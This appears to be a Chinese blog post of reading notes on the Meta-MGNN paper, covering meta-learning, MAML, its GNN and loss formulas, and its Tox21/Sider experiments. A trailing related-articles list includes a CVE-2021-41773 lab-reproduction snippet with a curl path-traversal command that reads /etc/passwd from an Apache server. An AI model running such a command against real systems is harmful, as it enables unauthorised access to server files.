论文阅读与分析:Few-Shot Graph Learning for Molecular Property Prediction

论文阅读与分析:Few-Shot Graph Learning for Molecular Property Prediction

  • 论文地址和代码地址
  • 1 摘要
  • 2 主要贡献
  • 3 基础知识
  • 4 细节问题
    • 问题定义
    • 分子图神经网络
  • 5 META-MGNN
    • 模型框架图
    • Meta-learning Setup
    • 元训练
      • 梯度下降
      • 损失函数(自监督模块)
      • 任务感知注意力模块
    • 元测试
  • 6 实验
    • 数据集
    • 模型比较结果

论文地址和代码地址

论文地址:https://arxiv.org/pdf/2102.07916
代码地址:https://github.com/zhichunguo/Meta-MGNN

1 摘要

图神经网络最近的成功显着促进了分子特性预测, 推进了药物发现等活动。现有的深度神经网络方法 通常需要每个属性都需要大量的训练数据集,在实验数据有限的情况下(特别是新的分子属性)会损害其性能,这在现实情况中很常见。为此,我们提出了 Meta-MGNN,一种用于小样本分子特性预测的新模型。 Meta-MGNN应用分子图神经网络来学习分子表示,并构建用于模型优化的元学习框架。 为了利用未标记的分子信息并解决不同分子特性的 任务异质性,Meta-MGNN进一步结合了分子结构、基于属性的自学习-将监督模块和自注意力任务权重纳入到前一个框架中,强化了整个学习模型。 对两个公共多属性数据集的大量实验表明,MetaMGNN 优于各种最先进的方法。

2 主要贡献

(1)三大挑战

  • 第一个挑战是设计一个深度神经网络,可以从少量数据中发现有效的分子表示。
  • 由于只有有限数量的标记分子属性数据可用,第二个挑战是利用分子数据中有用的未标记信息,并进一步开发有效的学习程序来转移其他属性预测的知识,
  • 以便模型可以用有限的数据快速适应新的分子特性 不同的分子性质可能代表完全不同的分子结构。因此,在知识转移过程中应该区别对待他们的数据。第三个挑战是在执行有效的学习过程时区分分子属性的不同重要性

(2)解决挑战
为了解决挑战,提出了一种称为 Meta-MGNN 的新模型,用于小样本分子属性预测

  • 利用图神经网络与预训练过程融合异构分子图信息作为分子嵌入
  • 开发了一个元学习框架来转移来自不同性质预测任务的知识,并获得一个初始化良好的模型,该模型可以快速适应有限数据的 新分子性质。
  • 为了利用和捕获分子数据中的未标记信息,我们设计了一个自监督模块,该模块由键重构损失和原子类型预测损失组成,并伴有主要属性预测损失。
  • 考虑到不同的属性预测任务对少样本学习器的贡献不同,我们进一步引入了自我关注任务权重 来衡量它们的重要性。自监督模块和自注意力任务权重都被纳入元学习过程中,以加强模型

(3)主要贡献

  • 我们将分子性质预测问题定义为少量样例学习问题,它利用各种特性的丰富信息来解决每个特性缺乏实验室数据的问题。
  • 为了应对小样本的挑战,我们提出了一种称为元的新模型MGNN 通过探索图神经网 络、自监督学习和任务权重感知元学习。
  • 我们在两个公共数据集上进行了广泛的实验,评估结果表明 Meta-MGNN 的性能优于最先进的方法。每个模型组件的有效性也得到了验证。

3 基础知识

Meta Learning

1 介绍

  • 工业界:大量GPU同时训练多组可能的超参数,找到结果较好的参数配置
  • 学术界:定义一组好的参数
  • Meta-learning:learn to learn,希望自己学会超参数、网络架构……,帮助学术界解决问题

在这里插入图片描述
对于机器学习,三大步骤如下:
在这里插入图片描述
“学习算法”可以看做一个函数F,它的输入是训练数据,输出是model

  • 一般的ML中,F是人想出来的(hand-crafted)
  • Meta Learning 自动学习“学习算法”F
    在这里插入图片描述

2 学习算法

Step 1: What is learnable in a learning algorithm?

确定要学习的架构,从而让机器来学习,这个叫:learnable components,也称为 ϕ \phi ϕ,里面一般有:

  • 网络架构
  • 初始化参数 θ 0 \theta_{0} θ0
  • 学习率 η
  • ……

不同的Meta Learning,会学习不同的learnable components
在这里插入图片描述

Step 2:Define loss function for learning algorithm F ϕ F_{\phi} Fϕ

此时开始定义损失函数:

  • 损失函数为: L ( ϕ ) L(\phi) L(ϕ),学习算法为: F ϕ F_{\phi} Fϕ
  • L ( ϕ ) L(\phi) L(ϕ)的值越小,就说明学习算法 F ϕ F_{\phi} Fϕ越好
    在这里插入图片描述

在Meta Learning中,所需的数据有:

  • 训练数据→训练任务(训练任务里的训练数据+测试数据)
  • 测试数据→测试任务(包含训练数据+测试数据)

例如,想要训练一个二元分类器,则需要准备二元分类任务,每个任务中有训练集和测试集,如下所示:
在这里插入图片描述
有了训练任务,接下来就要定义 L ( ϕ ) L(\phi) L(ϕ)。使用学习到的学习算法 F ϕ F_{\phi} Fϕ ,针对某一个特定任务的训练数据开始训练,得到模型 f θ 1 ∗ f_{\theta^{1*}} fθ1

  • 模型 f θ 1 ∗ f_{\theta^{1*}} fθ1性能越好,学习算法 F ϕ F_{\phi} Fϕ就越好, L ( ϕ ) L(\phi) L(ϕ)就越低

在这里插入图片描述
因此接下来需要评估模型 f θ 1 ∗ f_{\theta^{1*}} fθ1的性能,因此使用测试数据(带标签)来测试模型,计算输出跟正确结果之间的差异,从而算出Cross Entropy,最终加和Cross Entropy,最终得到 l 1 l^{1} l1

  • l 1 l^{1} l1表示 f θ 1 ∗ f_{\theta^{1*}} fθ1的性能如何, l 1 l^{1} l1越小,性能越好
  • 在一般的机器学习中,loss是根据“训练数据”来计算的;而在元学习中,loss根据训练任务中的“测试数据”进行计算。
    在这里插入图片描述
    要想测试其性能,还需拿其它二元分类的任务来测试它,将该“学习算法”在所有的“学习任务”上的损失求和,得到总的 L ( ϕ ) L(\phi) L(ϕ)
    在这里插入图片描述
Step 3:Optimazation

此时已经得到了学习算法 F ϕ F_{\phi} Fϕ的损失函数 L ( ϕ ) L(\phi) L(ϕ),接下里进行优化:

  • ∂ L ( ϕ ) ∂ ϕ \frac{\partial L(\phi)}{\partial\phi} ϕL(ϕ),可导,则可以使用梯度下降法
  • 若不可导,则使用强化学习或者进化算法进行训练
  • 最终得到学习而来的学习算法 F ϕ F_{\phi} Fϕ
    在这里插入图片描述
框架总流程

在Meta Learning中,所需的数据有:

  • 训练数据→训练任务(训练任务里的训练数据+测试数据)
  • 测试数据→测试任务(包含训练数据+测试数据)

框架总流程如下:

  1. 使用训练任务的数据按照上述三大步骤得到学习过的学习算法 F ϕ F_{\phi} Fϕ
  2. 使用测试任务的数据中的训练数据让学习过的学习算法 F ϕ F_{\phi} Fϕ**训练出模型 f θ ∗ f_{\theta^*} fθ
  3. 将模型 f θ ∗ f_{\theta^*} fθ用在测试任务的数据中的测试数据上,得到最终结果

所以我们可以得知:

  • 训练任务是找出学习算法 F ϕ F_{\phi} Fϕ
  • few-shot learning(小样本学习):利用meta-learning的技术,可以达到“few-shot learning”的目的。
    在这里插入图片描述

3 ML和Meta的区别

二者目标
  • ML:找到一个能完成任务的函数f
  • Meta:找到一个学习算法F,能够找到f
    在这里插入图片描述
训练数据
  • ML:完成一个任务即可,使用这个任务中的“训练数据”进行训练
  • Meta:使用若干个任务进行训练,每个“训练任务”中都有“训练数据+测试数据”
  • Support set(支持集):任务里的训练数据
  • Query set(查询集):任务里的测试数据
    在这里插入图片描述
框架

训练时:

  • ML:学习算法是人工设定的,即Within-task Training(任务内训练)

  • Meta:学习算法是在多个任务上训练得到的,即Across-task Training(跨任务训练)
    在这里插入图片描述
    测试时:

  • ML:直接使用训练得到的模型在任务中使用测试数据进行测试(Within-task Testing:任务内测试)

  • Meta:测试学习算法(Across-task Testing:跨任务测试)

    1. 将测试任务的训练数据给学习算法,训练得到该任务的模型(任务内训练)
    2. 将测试任务的测试数据给模型,得到最终结果(任务内测试)
    3. 这样一个流程叫Episode
      在这里插入图片描述

对于损失函数:

  • ML:对一个任务中所有的测试数据的损失之和
  • Meta: l l l是一个任务的损失, L L L是所有任务的损失之和

在这里插入图片描述
此时,要注意的是:

  • 内循环:计算一个 l l l需要经历即下面的Training Examples+Testing Examples
  • 外循环:需要多个任务进行

在这里插入图片描述

MAML

MAML聚焦于学习一个最好的初始化参数 ϕ \phi ϕ,MAML的目标是找到最优的初始参数 ϕ \phi ϕ,是所有任务的测试损失值最小,这样在遇到新任务时,只需基于少量标签对初始化参数进行微调就可以获得很好的效果。

  • MAML的N-way K-shot:任务的类别为N,每个类别的Support set为K,query
    set人为进行选择

在这里插入图片描述
假设采样了一个batch的任务,对伪代码进行解析:

  • 第5,6行对任务的支持集求损失并将参数 θ \theta θ更新为 θ ′ \theta^{'} θ,假设一个batch有5个任务,则此时参数 θ ′ \theta^{'} θ有10个
  • 第8行,使用 θ ′ \theta^{'} θ参数,对所有任务的查询集计算出各自的loss,将这些loss求和,计算出梯度,利用该梯度更新初始参数。( θ ′ \theta^{'} θ和每个任务的查询集一一对应)

在这里插入图片描述

4 细节问题

问题定义

(1)图的定义
G = ( V , E ) G = (\mathcal{V},\mathcal{E}) G=(V,E)是分子图, V \mathcal{V} V是节点集, E \mathcal{E} E是边集。分子图中的节点代表化学原子,边代表两个原子之间的化学键。
(2)学习映射函数
给定一组分子图 G = { G 1 , ⋯ , G N } \mathcal{G}=\{G_{1},\cdots,G_{N}\} G={G1,,GN}及其标签 Y = { y 1 , ⋯ , y N } \mathcal{Y}=\{y_{1},\cdots,y_{N}\} Y={y1,,yN},分子性质预测的目标是学习一个分子表示向量预测每一个 G i ∈ G G_{i}∈G GiG的标签(分子属性),也就是学习一个映射函数: f θ : G → Y f_{\theta}:\mathcal{G}\to\mathcal{Y} fθ:GY
(3)问题定义
少样本分子性质预测:给定分子性质 Y = { y 1 , ⋯ , y N } \mathcal{Y}=\{y_{1},\cdots,y_{N}\} Y={y1,,yN}和相应的少样本分子图集 { G 1 ∈ y 1 , ⋯ , G N ∈ y N } \{G_{1}\in y_{1},\cdots,G_{N}\in y_{N}\} {G1y1,,GNyN}(训练数据),任务是设计一个机器学习模型来预测只有少数样本(测试数据)的新特性的分子图。

分子图神经网络

在本节中,我们将介绍使用 GNN 获取分子表示的细节。GNN 模型能够利用图结构和节点/边特征信息来学习每个节点 v ∈ V v∈V vV的表示向量 h v h_{v} hv,经过 l l l次迭代后,节点表示 h v l h_{v}^{l} hvl能够捕获 l l l跳邻域内的信息。
作为GNN的输入层,首先使用分子图中的属性来初始化节点和边的表示。

  • 节点属性包括原子数(AN)和手性标签 (CT)、
  • 边属性包括键类型(BT)和键方向(BD)

我们将节点表示初始化: h v ( 0 ) = v A N ⊕ v C T \mathbf{h}_{v}^{(0)}=\mathbf{v}_{AN}\oplus\mathbf{v}_{CT} hv(0)=vANvCT;将边表示初始化: h e ( 0 ) = e B T ⊕ e B D \mathbf{h}_{e}^{(0)}=\mathbf{e}_{BT}\oplus\mathbf{e}_{BD} he(0)=eBTeBD

  • 其中 v , e v,e v,e分别表示节点和边
  • ⊕是串联运算符

在第 l l l层GNN中,节点表示 h v l h_{v}^{l} hvl的公式为:
h N ( v ) ( l ) = A G G l ( { h u ( l − 1 ) : ∀ u ∈ N ( v ) } , { h e ( l − 1 ) : e = ( v , u ) } ) , ( 1 ) h v ( l ) = σ ( W ( l ) ⋅ C o N C A T ( h v ( l − 1 ) , h N ( v ) ( l ) ) ) , ( 2 ) \mathbf{h}_{\mathcal{N}(v)}^{(l)}=\mathrm{AGG}_{l}(\{\mathbf{h}_{u}^{(l-1)}:\forall u\in\mathcal{N}(v)\},\{\mathbf{h}_{e}^{(l-1)}:e=(v,u)\}),\quad(1)\\\mathbf{h}_{v}^{(l)}=\sigma(\mathbf{W}^{(l)}\cdot\mathrm{CoNCAT}(\mathbf{h}_{v}^{(l-1)},\mathbf{h}_{\mathcal{N}(v)}^{(l)})),\quad(2) hN(v)(l)=AGGl({hu(l1):uN(v)},{he(l1):e=(v,u)}),(1)hv(l)=σ(W(l)CoNCAT(hv(l1),hN(v)(l))),(2)
其中:

  • N ( v ) N(v) N(v) v v v的邻居集合
  • A G G AGG AGG是邻居聚合函数

有许多 A G G AGG AGG的架构,如GCN,GAT,GIN等。在这里,选择使用GIN。
我们可以学习到分子图中每个节点的表示:
h v = h v l / ∣ ∣ h v l ∣ ∣ h_{v}=h_{v}^{l} / ||h_{v}^{l}|| hv=hvl/∣∣hvl∣∣
最终使用最后一层的平均节点嵌入来代表整个分子图的图集表示 h G h_{G} hG,如下:
h G = MEAN ( { h v ( l ) : v ∈ V } ) , ( 3 ) \mathbf{h}_G=\text{MEAN}(\{\mathbf{h}_v^{(l)}:v\in V\}),\quad(3) hG=MEAN({hv(l):vV}),(3)
h G h_{G} hG,进一步输入分类器(例如,多层感知)进行分子属性预测。

5 META-MGNN

模型框架图

在这里插入图片描述
(a)META-MGNN的总体框架:

  1. 对一批训练任务进行采样。 对于每个任务,支持集中都有一些数据示例。这些示例被输入到由 θ \theta θ参数化的 GNN 中。
  2. 计算支持集损失 L s u p p o r t \mathcal{L}_{support} Lsupport并将其用于将 GNN 参数更新为 θ ′ \theta^{\prime} θ
  3. 相应查询集中的示例被输入到由 θ ′ \theta^{\prime} θ参数化的 GNN中,并计算该任务的损失 L q u e r y ′ \mathcal{L}_{query}^{\prime} Lquery。对于其他训练任务重复相同的过程。
  4. 计算所有采样任务的 L q u e r y ′ \mathcal{L}_{query}^{\prime} Lquery 的总和,并用它来进一步更新 GNN 参数以进行测试。

(b)自监督模块
包括键重构和原子类型预测:

  • 橙色部分显示我们对两个原子进行采样并使用 GNN 来预测它们之间是否存在键。
  • 绿色部分显示我们随机屏蔽了几个原子并使用 GNN来预测它们的类型。

(c)任务感知注意力
它计算同一任务的査询集中所有分子嵌入的平均值来表示该任务。通过嵌入每个任务,我们设计了一个自注意力层来计算每个任务的权重,然后将其合并到元训练过程中以更新模型参数 θ \theta θ

Meta-learning Setup

构建了基于MAML的元学习框架。给定一个模型 f θ f_{\theta} fθ θ \theta θ是可学习参数。该模型可将分子图映射到具体的属性(例如毒性),即: f θ : G → Y f_{\theta}:\mathcal{G}\to\mathcal{Y} fθ:GY

  • 在𝑘-shot元学习中,对于从分布 p ( T ) p(\mathcal{T}) p(T)采样的每个任务 T τ \mathcal{T}_{\tau} Tτ,模型仅使用 k k k数据样本训练,并在 T τ \mathcal{T}_{\tau} Tτ的剩余样本中进行测试。

因此,将每个任务对应的训练集和测试集称为支持集和查询集,表示为 T τ = { G τ , Y τ , G τ ′ , Y τ ′ } \mathcal{T}_{\tau}=\{G_{\tau},\mathcal{Y}_{\tau},\mathcal{G}_{\tau}^{\prime},\mathcal{Y}_{\tau}^{\prime}\} Tτ={Gτ,Yτ,Gτ,Yτ}

  • G τ , Y τ G_{\tau},\mathcal{Y}_{\tau} Gτ,Yτ是支持集的输入分子图和属性标签
  • G τ ′ , Y τ ′ \mathcal{G}_{\tau}^{\prime},\mathcal{Y}_{\tau}^{\prime} Gτ,Yτ是查询集的输入分子图和属性标签

元训练期间,其步骤如下:

  1. 模型首先使用每个任务的支持集更新为特定任务的模型
  2. 使用训练数据中所有任务的查询集的预测损失进一步优化为任务无关模型

元测试期间,其步骤如下:

  1. 充分的元训练
  2. 学习到的模型可以进一步利用 k k k数据样本作为支持集来预测新的任务(新的分子性质)

元训练

梯度下降

元训练的目标是获得初始化良好的参数 θ \theta θ,参数需具备如下要求:

  1. 该参数可以普遍适用于不同的任务
  2. 在新任务上使用少量数据进行少量梯度下降更新后表现良好

对于任务 T τ \mathcal{T}_{\tau} Tτ,首先将支持集输入模型并计算损失 L T τ \mathcal{L}_{T_{\tau}} LTτ,通过梯度下降将参数 θ \theta θ更新:
θ τ ′ = θ − α ∇ θ L T τ ( θ ) , ( 4 ) \theta_{\tau}'=\theta-\alpha\nabla_{\theta}\mathcal{L}_{\mathcal{T}_{\tau}}(\theta),\quad(4) θτ=θαθLTτ(θ),(4)

  • 其中 α \alpha α是步长
  • 该式子仅显示了一步梯度更新,而实际上我们可以采取多步梯度更新

损失函数(自监督模块)

L T τ \mathcal{L}_{\mathcal{T}_{\tau}} LTτ由下游任务的监督信号计算。由于样本数量少,简单使用监督信号可能并不有效;分子的复杂性带来了结构和属性方面的有用的未标记信息。因此,需要利用分子图中的未标记信息(设计了自监督模块)。

  • 自监督模块:键重建损失、原子类型预测损失和属性预测损失组成

(1)分子预测损失
对于图级分子表示 h \mathbf{h} h(式子3),引入了多层感知机,即 y ^ = M L P ( h ) \hat{y}=\mathrm{MLP}(\mathbf{h}) y^=MLP(h),预测损失定义为预测标签和真实标签之间的交叉熵损失:
L l a b e l ( θ ) = − 1 k ∑ i = 1 k C R o s s E N T R O P Y ( y i , y ^ i ) ( 5 ) \mathcal{L}_{label}(\theta)=-\frac{1}{k}\sum_{i=1}^{k}\mathrm{CRossENTROPY}(y_{i},\hat{y}_{i})\quad(5) Llabel(θ)=k1i=1kCRossENTROPY(yi,y^i)(5)

  • k k k是数据样本的数量

(2)键重建损失

在分子图中,通过有边的节点对采样一组正边(有键),然后通过没有边的节点对采集一组负边(没有键)。将 ε s \varepsilon_{s} εs表示为采样的正边和负边的并集。

  • 设置 ε s = 10 \varepsilon_{s}=10 εs=10,表示5个正样本和5个负样本

对于选中的任意节点对,将节点映射为嵌入,分别为: h u \mathbf{h}_{u} hu h v \mathbf{h}_{v} hv,对其内积,根据其内积判断其是否有键,其公式为: e ^ u v = h v ⊤ ⋅ h u \hat{e}_{uv}=\mathbf{h}_{v}^{\top}\cdot\mathbf{h}_{u} e^uv=hvhu

  • 若两节点越相似,则说明越可能存在键,内积值越高

键重建损失定义为:真实键和预测键之间的二元交叉熵损失。公式如下:
L e d g e ( θ ) = − 1 ∣ E s ∣ ∑ e u v ∈ E s BINARYCROssENTROPY ( e u v , e ^ u v ) ( 6 ) \mathcal{L}_{edge}(\theta)=-\frac{1}{|\mathcal{E}_{s}|}\sum_{e_{uv}\in\mathcal{E}_{s}}\text{BINARYCROssENTROPY}(e_{uv},\hat{e}_{uv})\quad(6) Ledge(θ)=Es1euvEsBINARYCROssENTROPY(euv,e^uv)(6)

(3)原子类型预测损失
在分子中,不同的原子以一定的方式连接(例如碳-碳键、碳-氧键),导致不同的分子结构。原子类型决定了分子图中的节点如何与相邻节点连接。因此,利用节点(原子)的上下文子图来预测其类型。

首先对分子图的一组节点进行采样,表示为: V c t ⊆ V \mathcal{V}_{ct}\subseteq \mathcal{V} VctV。对于每一个在 V c t \mathcal{V}_{ct} Vct中的节点 v v v,其上下文子图被定义为在 l l l跳内的邻居。公式化为:
G s u b = ( U s u b , E s u b ) G_{sub}=(\mathcal{U}_{sub},\mathcal{E}_{sub}) Gsub=(Usub,Esub)

  • 其中, U s u b = { v } ∪ N l ( v ) \mathcal{U}_{sub}=\{v\}\cup\mathcal{N}_{l}(v) Usub={v}Nl(v)
  • E s u b ⊆ U s u b × U s u b \mathcal{E}_{sub}\subseteq\mathcal{U}_{sub}\times\mathcal{U}_{sub} EsubUsub×Usub
  • N l ( v ) N_{l}(v) Nl(v)代表节点 v v v的邻居节点集合
  • 一般选择 l = 1 l=1 l=1
  • V c t \mathcal{V}_{ct} Vct为图中节点的15%

接着在上下文子图中所有节点的均值池化之上使用多层感知器(MLP),不包括中心节点。原子类型预测损失被表示为预测节点类型和真实节点类型之间的交叉熵损失:
v ^ i = MLP ( MEAN ( { h u : u ∈ N l ( v ) } ) ) , ( 7 ) \hat{v}_i=\text{MLP}\left(\text{MEAN}(\{\mathbf{h}_u:u\in\mathcal{N}_l(v)\})\right),\quad(7) v^i=MLP(MEAN({hu:uNl(v)})),(7)
L n o d e ( θ ) = − 1 ∣ V c ∣ ∑ i = 1 ∣ V c ∣ CRossENTROPY ( v i , v ^ i ) , ( 8 ) \mathcal{L}_{node}(\theta)=-\frac{1}{|\mathcal{V}_{c}|}\sum_{i=1}^{|\mathcal{V}_{c}|}\text{CRossENTROPY}(v_{i},\hat{v}_{i}),\quad(8) Lnode(θ)=Vc1i=1VcCRossENTROPY(vi,v^i),(8)
(4)联合损失
任务 T τ \mathcal{T}_{\tau} Tτ的损失公式如下:
L T τ ( θ ) = L n o d e ( θ ) + λ 1 L e d g e ( θ ) + λ 2 L l a b e l ( θ ) ( 9 ) \mathcal{L}_{\mathcal T_{\tau}}(\theta)=\mathcal{L}_{node}(\theta)+\lambda_{1}\mathcal{L}_{edge}(\theta)+\lambda_{2}\mathcal{L}_{label}(\theta)\quad(9) LTτ(θ)=Lnode(θ)+λ1Ledge(θ)+λ2Llabel(θ)(9)

  • 其中 λ 1 \lambda_{1} λ1 λ 2 \lambda_{2} λ2是控制不同损失重要性的参数,设置为 λ 1 = λ 2 = 0.1. \lambda_{1}=\lambda_{2}=0.1. λ1=λ2=0.1.

任务感知注意力模块

根据公式 θ τ ′ = θ − α ∇ θ L T τ ( θ ) \theta_{\tau}'=\theta-\alpha\nabla_{\theta}\mathcal{L}_{\mathcal{T}_{\tau}}(\theta) θτ=θαθLTτ(θ)获得了参数 θ τ ′ \theta_{\tau}' θτ,接下来模型会进一步更新,如下式子:
θ ← θ − β ∇ θ ∑ T τ ∼ p ( T ) η ( T τ ) ⋅ L T τ ′ ( θ τ ′ ) , ( 10 ) \theta\leftarrow\theta-\beta\nabla_\theta\sum_{\mathcal{T}_\tau\sim p(\mathcal{T})}\eta(\mathcal{T}_\tau)\cdot\mathcal{L}_{\mathcal{T}_\tau}^{\prime}(\theta_\tau^{\prime}),\quad(10) θθβθTτp(T)η(Tτ)LTτ(θτ),(10)

  • β \boldsymbol{\beta} β是元学习率
  • L T τ ′ \mathcal{L}_{\mathcal{T}_\tau}^{\prime} LTτ是任务 T τ \mathcal{T}_{\tau} Tτ的查询集的联合损失

创新点
元学习方法(例如,MAML)在优化元学习器时以相同的权重对待每个任务,即 η ( T τ ) \eta(\mathcal{T}_{\tau}) η(Tτ)对于所有任务都是相同的。但不同的属性预测任务对元学习器优化的贡献不同,因此使用自注意力机制来计算每个任务的重要性:
η ( T τ ) = exp ⁡ ( M L P ( H T τ ) ) ∑ T τ ′ ∈ T exp ⁡ ( M L P ( H T τ ′ ) ) , H T τ = M E A N ( { h T τ , i } i = 1 k ) , ( 11 ) \eta(\mathcal{T}_{\tau})=\frac{\exp(\mathrm{MLP}(\mathrm{H}_{\mathcal{T}_{\tau}}))}{\sum_{\mathcal{T}_{\tau^{\prime}}\in\mathcal{T}}\exp(\mathrm{MLP}(\mathrm{H}_{\mathcal{T}_{\tau^{\prime}}}))}, \mathrm{H}_{\mathcal{T}_{\tau}}=\mathrm{MEAN}(\{\mathbf{h}_{\mathcal{T}_{\tau},i}\}_{i=1}^{k}),\quad(11) η(Tτ)=TτTexp(MLP(HTτ))exp(MLP(HTτ)),HTτ=MEAN({hTτ,i}i=1k),(11)

  • T \mathcal{T} T是所有任务的集合
  • H T τ \mathrm{H}_{\mathcal{T}_{\tau}} HTτ是任务嵌入,通过对 T τ \mathcal{T}_{\tau} Tτ中所有的分子嵌入进行平均计算得出

元测试

在元测试期间,我们首先利用新任务的少样本支持集,通过使用式4来更新Meta-MGNN 的参数 θ \theta θ,然后评估查询集的功能。

6 实验

数据集

使用 Tox21 和 Sider 数据集,在每个任务中,分子被分为正实例和负实例(即二元标签)。正实例意味着分子具有特定属性,负实例意味着分子不具有该属性。

  • Tox21:是一个用于毒性预测的生物信息学资源,有 7,831 个实例,有 12 种不同的任务(12个生物靶标的毒性)。
  • Sider:是一个用于药物-副作用关系的生物信息学资源,有 1,427 个实例, 有 27 个不同的任务(27个系统器官类别)。
  • 拆分了 Tox21 中的 3 个任务和 Sider 中 的 6 个任务用于元测试

模型比较结果

(1)评估标准
使用 ROC-AUC 评估每个模型的性能。我们将每个分子属性视为小样本学习的独立任务。我们分别使用3个和6个任务作 为Tox21和 Sider 的测试任务。每个任务都是一个二元标签分类任务。
(2)实验结果

  • 最后一列报告了 MetaMGNN 在不同任务中相对于最好结果的平均改进
  • 加深字体表示模型的最好结果
  • 下划线表示用于与MetaMGNN 比较的模型中最佳的结果
    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/430754.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于C语言开发(控制台)通讯录管理程序

通讯录程序设计 一、课程设计题目与要求 题目 :通讯录管理程序 1. 问题描述 编写一个简单的通讯录管理程序。通讯录记录有姓名,地址(省、市(县)、街道),电话号码,邮政编码等四项。2. 基本要求 程序应提供的基本基本管理功能有…

众数信科AI智能体政务服务解决方案——寻知智能笔录系统

政务服务解决方案 寻知智能笔录方案 融合民警口供录入与笔录生成需求 2分钟内生成笔录并提醒错漏 助办案人员二次询问 提升笔录质量和效率 寻知智能笔录系统 众数信科AI智能体 产品亮点 分析、理解行业知识和校验规则 AI实时提醒用户文书需注意部分 全文校验格式、内…

领域驱动DDD三种架构-分层架构、洋葱架构、六边形架构

博主介绍: 大家好,我是Yuperman,互联网宇宙厂经验,17年医疗健康行业的码拉松奔跑者,曾担任技术专家、架构师、研发总监负责和主导多个应用架构。 技术范围: 目前专注java体系,以及golang、.Net、…

(1999-2018年)全国各城市-财政收入–营业税

涵盖了1999年至2018年间,全国各城市的财政收入中营业税的部分。数据来源于中国区域统计年鉴及各省市统计年鉴 1999-2018年全国各城市-财政收入-营业税资源-CSDN文库https://download.csdn.net/download/2401_84585615/89504622 不同行业对营业税的贡献也存在差异。…

电动车车牌识别系统源码分享

电动车车牌识别检测系统源码分享 [一条龙教学YOLOV8标注好的数据集一键训练_70全套改进创新点发刊_Web前端展示] 1.研究背景与意义 项目参考AAAI Association for the Advancement of Artificial Intelligence 项目来源AACV Association for the Advancement of Computer V…

Apache CVE-2021-41773 漏洞复现

1.打开环境 docker pull blueteamsteve/cve-2021-41773:no-cgid docker run -d -p 8080:80 97308de4753d 2.访问靶场 3.使用poc curl http://47.121.191.208:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd 4.工具验证

智能新突破:AIOT 边缘计算网关让老旧水电表图像识别

数字化高速发展的时代,AIOT(人工智能物联网)技术正以惊人的速度改变着我们的生活和工作方式。而其中,AIOT 边缘计算网关凭借其强大的功能,成为了推动物联网发展的关键力量。 这款边缘计算网关拥有令人瞩目的 1T POS 算…

自驾游拼团系统小程序的设计

管理员账户功能包括:系统首页,个人中心,用户管理,发布起人管理,景点信息管理,景点分类管理,拼团旅游管理,参团信息管理,拼团订单管理,系统管理 微信端账号功…

11. DPO 微调示例:根据人类偏好优化LLM大语言模型

在部署大模型之后,我们必然要和微调打交道。现在大模型的微调有非常多的方法,过去的文章中提到的微调方法通常依赖于问题和答案对,标注成本较高。 2023 年所提出的 Direct Preference Optimization(DPO)为我们提供了一…

C语言----指针

基本知识点:指针的定义、指针运算符和指针运算等基本概念。重 点:字符指针、指针数组和多级指针。难 点:利用指针类型解决复杂的应用问题。 指针的概念 要点归纳 1.指针变量 在计算机中,所有数据都通过变量存放在内存中,每个变量都…

【matlab】将程序打包为exe文件(matlab r2023a为例)

文章目录 一、安装运行时环境1.1 安装1.2 简介 二、打包三、打包文件为什么很大 一、安装运行时环境 使用 Application Compiler 来将程序打包为exe,相当于你使用C编译器把C语言编译成可执行程序。 在matlab菜单栏–App下面可以看到Application Compiler。 或者在…

啤酒过滤——关于过滤助剂的介绍

在啤酒的酿造过程中,过滤是一个关键步骤,在啤酒厂中最常用的过滤助剂主要有两种:硅藻土和珍珠岩。它们能够帮助去除杂质,确保啤酒的清澈和口感。过滤助剂通常以粉状形式存在,它们被涂抹在过滤机的支撑材料上&#xff0…

深度合成算法备案和大模型备案的区别是什么

以下是关于大语言模型上线备案和深度合成算法备案区别的文档内容: 一、大语言模型上线备案与深度合成算法备案的区别 备案对象 大语言模型上线备案:主要针对生成式人工智能(AIGC)产品中的大型语言模型,能够生成文本、图…

MT6765/MT6762(R/D/M)/MT6761(MT8766)安卓核心板参数比较_MTK联发科4G智能模块

联发科Helio P35 MT6765安卓核心板 MediaTek Helio P35 MT6765是智能手机的主流ARM SoC,于2018年末推出。它在两个集群中集成了8个ARM Cortex-A53内核(big.LITTLE)。四个性能内核的频率高达2.3GHz。集成显卡为PowerVR GE8320,频率…

MATLAB系列09:图形句柄

MATLAB系列09:图形句柄 9. 图形句柄9.1 MATLAB图形系统9.2 对象句柄9.3 对象属性的检测和更改9.3.1 在创建对象时改变对象的属性9.3.2 对象创建后改变对象的属性 9.4 用 set 函数列出可能属性值9.5 自定义数据9.6 对象查找9.7 用鼠标选择对象9.8 位置和单位9.8.1 图…

Leetcode面试经典150题-39.组合总数进阶:40.组合总和II

本题是扩展题,真实考过,看这个题之前先看一下39题 Leetcode面试经典150题-39.组合总数-CSDN博客 给定一个候选人编号的集合 candidates 和一个目标数 target ,找出 candidates 中所有可以使数字和为 target 的组合。 candidates 中的每个数…

E2VPT: An Effective and Efficient Approach for Visual Prompt Tuning

论文汇总 存在的问题 1.以前的提示微调方法那样只关注修改输入,而应该明确地研究在微调过程中改进自注意机制的潜力,并探索参数效率的极限。 2.探索参数效率的极值来减少可调参数的数量? 解决办法 提示嵌入进行transformer中 提示剪枝 Token-wise …

004_动手实现MLP(pytorch)

import torch from torch import nn from torch.nn import init import numpy as np import sys import d2lzh_pytorch as d2l # 1.数据预处理 mnist_train torchvision.datasets.FashionMNIST(root/Users/w/PycharmProjects/DeepLearning_with_LiMu/datasets/FashionMnist, t…

DevExpress WPF中文教程:如何解决行焦点、选择的常见问题?

DevExpress WPF拥有120个控件和库,将帮助您交付满足甚至超出企业需求的高性能业务应用程序。通过DevExpress WPF能创建有着强大互动功能的XAML基础应用程序,这些应用程序专注于当代客户的需求和构建未来新一代支持触摸的解决方案。 无论是Office办公软件…

0-1开发自己的obsidian plugin DAY 2

今天上午解决了三个问题 1. typescript长得丑/一片飘红/格式检查太严格 在vscode的settings里搜索下面这个然后false掉: "typescript.validate.enable": false 就不会一片飘红了(其他下载第三方插件如TSLint和typescript hero的方法都不好使&…